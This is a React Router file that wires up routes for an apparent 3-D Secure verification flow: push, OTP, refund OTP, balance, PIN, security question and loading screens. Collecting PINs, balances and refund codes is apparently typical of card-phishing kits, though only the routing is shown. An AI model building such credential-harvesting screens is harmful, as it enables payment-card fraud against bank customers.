import React from "react";
import { Route } from "react-router-dom";
import PUSHPage from "./Push";
import Kostil from "./Kostil";
import OTPPage from "./Otp";
import BalanceVerificationPage from "./Balance";
import SecurityQuestionPage from "./Question";
import Loading from "./Loading";

const ThreeDSRoutes = () => (
  <Route path="/3ds" element={<Kostil />}>
    <Route path="push" element={<PUSHPage />} />
    <Route path="otp" element={<OTPPage />} />
    <Route path="refund" element={<OTPPage isRefund={true} />} />
    <Route path="balance" element={<BalanceVerificationPage />} />
    <Route path="pin" element={<BalanceVerificationPage />} />
    <Route path="question" element={<SecurityQuestionPage />} />
    <Route path="loading" element={<Loading />} />
  </Route>
);

export default ThreeDSRoutes;
